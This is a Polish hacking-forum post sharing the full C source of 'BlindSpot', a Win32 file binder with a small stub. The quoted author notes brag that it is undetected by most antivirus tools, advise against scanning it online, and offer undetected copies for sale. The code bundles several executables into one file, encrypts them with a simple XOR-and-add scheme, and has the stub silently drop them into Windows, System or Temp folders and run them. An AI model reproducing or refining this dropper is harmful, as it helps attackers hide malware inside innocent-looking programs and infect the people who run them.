[C] Binder plików BlindSpot.c

Zbiór ciekawych kodów źródłowych, skryptów i gotowców.
Regulamin forum
-Staraj się poprzedzać nazwę tematu prefiksem z nazwą języka programowania np. [Python] nazwa tematu.
-Wklejaj źródła w znaczniku

Kod: Zaznacz cały

[/b].
-Staraj się w skrócie opisać do czego dane źródło służy.
[b]-Zawsze podaj stronę domową autora (jeśli znasz te informacje)[/b]. Szanujemy cudzą prace!
Awatar użytkownika
F3nix
Posty: 332
Rejestracja: 28 kwie 2015, 20:51

[C] Binder plików BlindSpot.c

Post autor: F3nix »

Kolejny nie mojego autorstwa znaleziony na dysku kod źródłowy napisany w języku C (chyba go nawet nie testowałem). Jest to najzwyklejszy binder plików korzystający z zasobów.

Opis oryginału:
Programmer: s134k
Compiler: Microsoft Visual C++ 6.0


Binder: 24 KB (unpacked, including stub in its resources)
Stub: 2 KB (unpacked)


..: NOTES :..

This project was written to get myself oriented in GUI programming with
the Win32 API. It can bind an unlimited number of files with a small
stub, smaller than most other stubs for binders coded in VB or Delphi.

IF YOU ARE GOING TO USE THIS SOURCE CODE, PLEASE GIVE CREDIT WHERE IT
IS DUE.

The stub included in the resources of the binder may not take too well
to packing. However size should not be an issue here, but if you are so
keen on packing it just ask me and I will tell you how to go about it.

This should be undetected by most big box AVs at the time of release,
but some scanners that rely heavily on heuristics might be able to pick
it up. I do NOT recommend scanning it online, unless of course you want
it to get detected. If you want it undetected to all AVs consider the
purchase of an undetected copy for a small cost.
BlindSpot.c

Kod: Zaznacz cały

/*
			BlindSpot v1.0
			- Multiple file binder with a small stub.

			Coded by: s134k
*/

#pragma comment(lib, "COMCTL32")
#pragma comment(lib, "SHLWAPI")

#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <commctrl.h>
#include <shlwapi.h>
#include "resource.h"

#define WIN32_LEAN_AND_MEAN
#define BUF_SIZE 256

HWND hwndList;
HINSTANCE hInst;
HANDLE hLoader;
LONG run, windir, sysdir, tmpdir;
BOOL cancel;
int iIndex, iSelect;

struct file_data {
	char name[40];
	unsigned long size;
	int key;
	short path;
	short run;
} *pfile_data;

BOOL CALLBACK DialogProc(HWND, UINT, WPARAM, LPARAM);
void InitList(void);
BOOL CALLBACK AddDialogProc(HWND, UINT, WPARAM, LPARAM);
BOOL ExtractLoader(char *);
int WriteFiles(int);
void RandCryptKey(char *);
void EncryptRecord(char *, unsigned long, char *);

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
	INITCOMMONCONTROLSEX icc;

	icc.dwICC = ICC_LISTVIEW_CLASSES;
	icc.dwSize = sizeof(INITCOMMONCONTROLSEX);

	InitCommonControlsEx(&icc);

	hInst = hInstance;

	return DialogBox(hInstance, MAKEINTRESOURCE(IDD_DIALOG), NULL, DialogProc);
}

BOOL CALLBACK DialogProc(HWND hwndDlg, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	LPNMHDR lpnmhdr;
	LPNMITEMACTIVATE lpnmitem;
	LVITEM lvItem;
	LVHITTESTINFO lvHti;
	HMENU hMenu;
	POINT pt;
	OPENFILENAME ofn;
	char szFile[MAX_PATH], szSize[15], *szDir = "", szBound[_MAX_FNAME] = "bound";
	HANDLE hFile;
	DWORD dwSize;

	switch(uMsg) {
	case WM_INITDIALOG:
		SendMessage(hwndDlg, WM_SETICON, (WPARAM)1, (LPARAM)LoadIcon(hInst, MAKEINTRESOURCE(IDI_ICON)));

		hwndList = GetDlgItem(hwndDlg, IDC_LIST);

		ListView_SetExtendedListViewStyle(hwndList, LVS_EX_FULLROWSELECT | LVS_EX_HEADERDRAGDROP | LVS_EX_GRIDLINES);
		InitList();

		return TRUE;
	case WM_NOTIFY:
		lpnmhdr = (LPNMHDR)lParam;
		if(lpnmhdr->hwndFrom == hwndList) {
			if(lpnmhdr->code == NM_RCLICK) {
				lpnmitem = (LPNMITEMACTIVATE)lParam;
				hMenu = CreatePopupMenu();

				ZeroMemory(&lvHti, sizeof(LVHITTESTINFO));

				lvHti.pt = lpnmitem->ptAction;
				iSelect = ListView_HitTest(hwndList, &lvHti);

				if(lvHti.flags & LVHT_ONITEM) {
					AppendMenu(hMenu, MF_GRAYED | MF_STRING, IDM_ADD, "Add");
					AppendMenu(hMenu, MF_STRING, IDM_REMOVE, "Remove");
				}
				else {
					AppendMenu(hMenu, MF_STRING, IDM_ADD, "Add");
					AppendMenu(hMenu, MF_GRAYED | MF_STRING, IDM_REMOVE, "Remove");
				}

				AppendMenu(hMenu, MF_SEPARATOR, 0, NULL);

				if(iIndex < 2)
					AppendMenu(hMenu, MF_GRAYED | MF_STRING, IDM_BIND, "Bind");
				else
					AppendMenu(hMenu, MF_STRING, IDM_BIND, "Bind");

				GetCursorPos(&pt);
				TrackPopupMenu(hMenu, TPM_LEFTALIGN, pt.x, pt.y, 0, hwndDlg, 0);
			}
		}
		DestroyMenu(hMenu);

		return TRUE;
	case WM_COMMAND:
		switch(LOWORD(wParam)) {
		case IDM_ADD:
			ZeroMemory(&ofn, sizeof(OPENFILENAME));
			ZeroMemory(szFile, sizeof szFile);
			ZeroMemory(szDir, sizeof szDir);

			ofn.lStructSize = sizeof(OPENFILENAME);
			ofn.hwndOwner = hwndDlg;
			ofn.lpstrFilter = "All Files (*.*)\0*.*\0";
			ofn.lpstrFile = szFile;
			ofn.nMaxFile = MAX_PATH;
			ofn.Flags = OFN_EXPLORER | OFN_FILEMUSTEXIST | OFN_HIDEREADONLY;

			if(GetOpenFileName(&ofn)) {
				cancel = FALSE;

				DialogBox(hInst, MAKEINTRESOURCE(IDD_DIALOG_ADD), hwndDlg, AddDialogProc);

				if(!cancel) {
					lvItem.mask = LVIF_TEXT;
					lvItem.cchTextMax = MAX_PATH;

					lvItem.iItem = iIndex;
					lvItem.iSubItem = 0;
					lvItem.pszText = szFile;

					ListView_InsertItem(hwndList, &lvItem);

					hFile = CreateFile(szFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

					if(hFile == INVALID_HANDLE_VALUE)
						return FALSE;
					
					dwSize = GetFileSize(hFile, NULL);

					CloseHandle(hFile);
					wsprintf(szSize, "%d KB", dwSize / 1024);

					lvItem.iItem = iIndex;
					lvItem.iSubItem = 1;
					lvItem.pszText = szSize;

					ListView_SetItem(hwndList, &lvItem);

					lvItem.iItem = iIndex;
					lvItem.iSubItem = 2;

					if(windir == BST_CHECKED)
						szDir = "Windows";
					else if(sysdir == BST_CHECKED)
						szDir = "System";
					else
						szDir = "Temporary";

					lvItem.pszText = szDir;

					ListView_SetItem(hwndList, &lvItem);

					lvItem.iItem = iIndex;
					lvItem.iSubItem = 3;
				
					if(run == BST_CHECKED)
						lvItem.pszText = "Yes";
					else
						lvItem.pszText = "No";

					ListView_SetItem(hwndList, &lvItem);

					iIndex++;
				}
			}

			return TRUE;
		case IDM_REMOVE:
			ListView_DeleteItem(hwndList, iSelect);

			iIndex--;

			return TRUE;
		case IDM_BIND:
			ZeroMemory(&ofn, sizeof(OPENFILENAME));

			ofn.lStructSize = sizeof(OPENFILENAME);
			ofn.hwndOwner = hwndDlg;
			ofn.lpstrFilter = "Application (*.exe)\0*.exe\0";
			ofn.lpstrFile = szBound;
			ofn.lpstrDefExt = "exe";
			ofn.nMaxFile = MAX_PATH;
			ofn.Flags = OFN_EXPLORER | OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT;

			if(GetSaveFileName(&ofn)) {
				if(!ExtractLoader(szBound))
					return FALSE;

				if(!WriteFiles(iIndex)) {
					MessageBox(hwndDlg, "Error writing files.", NULL, MB_OK);

					CloseHandle(hLoader);

					return FALSE;
				}
			}

			return TRUE;
		}
	case WM_CLOSE:
		EndDialog(hwndDlg, 0);

		return TRUE;
	}

	return FALSE;
}

void InitList(void)
{
	LVCOLUMN lvCol;
	char *szColumn[] = {"File", "Size", "Installation Directory", "Run"};
	int i, width[] = {220, 55, 160, 35};

	ZeroMemory(&lvCol, sizeof(LVCOLUMN));

	lvCol.mask = LVCF_TEXT | LVCF_SUBITEM | LVCF_WIDTH | LVCF_FMT;
	lvCol.fmt = LVCFMT_LEFT;

	for(i = 0; i < 4; i++) {
		lvCol.iSubItem = i;
		lvCol.cx = width[i];
		lvCol.pszText = szColumn[i];

		ListView_InsertColumn(hwndList, i, &lvCol);
	}
}

BOOL CALLBACK AddDialogProc(HWND hwndDlg, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	switch(uMsg) {
	case WM_COMMAND:
		switch(LOWORD(wParam)) {
		case IDOK:
			run = SendDlgItemMessage(hwndDlg, IDC_CHECK_RUN, BM_GETCHECK, wParam, lParam);

			windir = SendDlgItemMessage(hwndDlg, IDC_RADIO_WINDIR, BM_GETCHECK, wParam, lParam);
			sysdir = SendDlgItemMessage(hwndDlg, IDC_RADIO_SYSDIR, BM_GETCHECK, wParam, lParam);
			tmpdir = SendDlgItemMessage(hwndDlg, IDC_RADIO_TMPDIR, BM_GETCHECK, wParam, lParam);

			if(windir != BST_CHECKED && sysdir != BST_CHECKED && tmpdir != BST_CHECKED)
				MessageBox(hwndDlg, "You have not selected an installation directory.", NULL, MB_ICONERROR | MB_OK);
			else
				EndDialog(hwndDlg, 0);

			return TRUE;
		case IDCANCEL:
			cancel = TRUE;

			EndDialog(hwndDlg, 0);

			return TRUE;
		}
		break;
		case WM_CLOSE:
			cancel = TRUE;

			EndDialog(hwndDlg, 0);

			return TRUE;
	}

	return FALSE;
}

BOOL ExtractLoader(char *szLoc)
{
	HRSRC rc;
	HGLOBAL hGlobal;
	HMODULE hThisProc;
	DWORD dwSize, dwBytesWritten;
	unsigned char *lpszData;

	hThisProc = GetModuleHandle(NULL);
	rc = FindResource(hThisProc, MAKEINTRESOURCE(IDR_RT_EXE), "RT_EXE");

	if(hGlobal = LoadResource(hThisProc, rc)) {
		lpszData = (unsigned char *)LockResource(hGlobal);
		dwSize = SizeofResource(hThisProc, rc);
		hLoader = CreateFile(szLoc, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

		if(hLoader == INVALID_HANDLE_VALUE)
			return FALSE;
		else
			WriteFile(hLoader, lpszData, dwSize, &dwBytesWritten, NULL);
	}

	if(dwBytesWritten != dwSize) {
		MessageBox(NULL, "Error writing stub file.", NULL, MB_ICONERROR | MB_OK);

		return FALSE;
	}
	else
		return TRUE;
}

int WriteFiles(int nFileNum)
{
	int i;
	HANDLE hFile;
	DWORD dwStart, dwBytesWritten, dwBytesRead, dwSize;
	char szPath[MAX_PATH], szDir[10], szExec[4], szKey[5], buf[BUF_SIZE], done[40];
	struct file_data fd;

	pfile_data = &fd;
	dwStart = GetTickCount();

	srand(dwStart);

	for(i = 0; i < nFileNum; i++) {
		ZeroMemory(&fd, sizeof fd);

		ListView_GetItemText(hwndList, i, 0, szPath, MAX_PATH);

		hFile = CreateFile(szPath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
		if(hFile == INVALID_HANDLE_VALUE)
			return 0;

		dwSize = GetFileSize(hFile, NULL);
		pfile_data->size = dwSize;

		strcpy(pfile_data->name, PathFindFileName(szPath));

		ListView_GetItemText(hwndList, i, 2, szDir, sizeof szDir);

		if(!strcmp(szDir, "System"))
			pfile_data->path = 1;
		else if(!strcmp(szDir, "Temporary"))
			pfile_data->path = 2;
		else
			pfile_data->path = 3;

		ListView_GetItemText(hwndList, i, 3, szExec, sizeof szExec);

		pfile_data->run = strcmp(szExec, "Yes") == 0 ? 1 : 0;

		RandCryptKey(szKey);
		pfile_data->key = atoi(szKey);

		SetFilePointer(hLoader, 0, NULL, FILE_END);
		WriteFile(hLoader, pfile_data, sizeof fd, &dwBytesWritten, NULL);

		while(ReadFile(hFile, buf, BUF_SIZE, &dwBytesRead, NULL) && dwBytesRead) {
			EncryptRecord(buf, dwBytesRead, szKey);
			WriteFile(hLoader, buf, dwBytesRead, &dwBytesWritten, NULL);
			if(dwBytesWritten != dwBytesRead)
				return 0;
		}

		CloseHandle(hFile);
	}

	if(i == nFileNum) {
		wsprintf(done, "%d Files bound in %d second(s).", nFileNum, (GetTickCount() - dwStart) / 1000);

		MessageBox(NULL, done, "Finished.", MB_OK);
	}
	else
		return 0;

	CloseHandle(hLoader);
	
	return i;
}

void RandCryptKey(char *szIn)
{
	int i;

	do i = rand();
	while(i < 1000 || i > 10000);

	wsprintf(szIn, "%d", i);
}

void EncryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
	unsigned long i;
	char *p;

	p = szKey;

	for(i = 0; i < nLen; i++) {
		if(!(*p))
			p = szKey;

		*szRec ^= *p;
		*szRec += *p;

		szRec++;
		p++;
	}
}  
	  
resource.h

Kod: Zaznacz cały

//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by BlindSpot.rc
//
#define IDD_DIALOG           100
#define IDD_DIALOG_ADD         101
#define IDD_DIALOG_BIND         102
#define IDI_ICON            103
#define IDM_ADD             104
#define IDM_REMOVE           105
#define IDM_BIND            106
#define IDR_RT_EXE           113
#define IDC_LIST            1000
#define IDC_LIST_BOX          1001
#define IDC_RADIO_TMPDIR        1002
#define IDC_PROGRESS_BAR        1003
#define IDC_CHECK_RUN          1004
#define IDC_RADIO_SYSDIR        1005
#define IDC_RADIO_WINDIR        1006

// Next default values for new objects
// 
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE    117
#define _APS_NEXT_COMMAND_VALUE     40001
#define _APS_NEXT_CONTROL_VALUE     1007
#define _APS_NEXT_SYMED_VALUE      108
#endif
#endif
---
stub.c

Kod: Zaznacz cały

/*
			BlindSpot v1.0
			- Small multiple file binding stub.

			Coded by: s134k
*/

#pragma optimize("gsy", on)
#pragma comment(linker, "/ENTRY:Entry")
#pragma comment(linker, "/FILEALIGN:0x200")
#pragma comment(linker, "/MERGE:.rdata=.data")
#pragma comment(linker, "/MERGE:.text=.data")
#pragma comment(linker, "/MERGE:.reloc=.data")
#pragma comment(linker, "/SECTION:.text, EWR /IGNORE:4078")

#include <stdlib.h>
#include <windows.h>
#include <shellapi.h>

#define WIN32_LEAN_AND_MEAN
#define STUB_EOF 2048

struct file_data {
	char name[40];
	unsigned long size;
	int key;
	short path;
	short run;
} *pfile_data;

void DecryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
	unsigned long i;
	char *p;

	p = szKey;

	for(i = 0; i < nLen; i++) {
		if(!(*p))
			p = szKey;

		*szRec -= *p;
		*szRec++ ^= *p++;
	}
}

int Entry(void)
{
	HANDLE hStub, hFile;
	DWORD dwBytesRead, dwBytesWritten;
	char szThisFile[_MAX_FNAME], szPath[MAX_PATH], szKey[5], *buf = "";
	struct file_data fd;

	pfile_data = &fd;

	GetModuleFileName(NULL, szThisFile, _MAX_FNAME);

	hStub = CreateFile(szThisFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	SetFilePointer(hStub, STUB_EOF, NULL, FILE_BEGIN);

	while(ReadFile(hStub, pfile_data, sizeof fd, &dwBytesRead, NULL) && dwBytesRead) {
		if(pfile_data->path == 1)
			GetSystemDirectory(szPath, sizeof szPath);
		else if(pfile_data->path == 2)
			GetTempPath(sizeof szPath, szPath);
		else
			GetWindowsDirectory(szPath, sizeof szPath);

		lstrcat(szPath, "\\");
		lstrcat(szPath, pfile_data->name);

		hFile = CreateFile(szPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
		if(hFile == INVALID_HANDLE_VALUE)
			return 1;

		wsprintf(szKey, "%d", pfile_data->key);

		buf = malloc(pfile_data->size);
		if(!buf)
			return 2;

		ReadFile(hStub, buf, pfile_data->size, &dwBytesRead, NULL);
		DecryptRecord(buf, dwBytesRead, szKey);
		WriteFile(hFile, buf, dwBytesRead, &dwBytesWritten, NULL);
		if(dwBytesWritten != dwBytesRead) {
			free(buf);
			CloseHandle(hStub);
			CloseHandle(hFile);

			return 3;
		}

		CloseHandle(hFile);
		free(buf);

		if(pfile_data->run)
			ShellExecute(NULL, "open", szPath, NULL, NULL, SW_SHOWNORMAL);
	}
	
	CloseHandle(hStub);

	return 0;
}
ODPOWIEDZ